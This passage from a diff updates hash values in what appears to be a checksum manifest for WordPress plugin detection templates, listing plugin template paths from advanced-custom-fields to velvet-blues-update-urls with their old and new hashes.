-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e 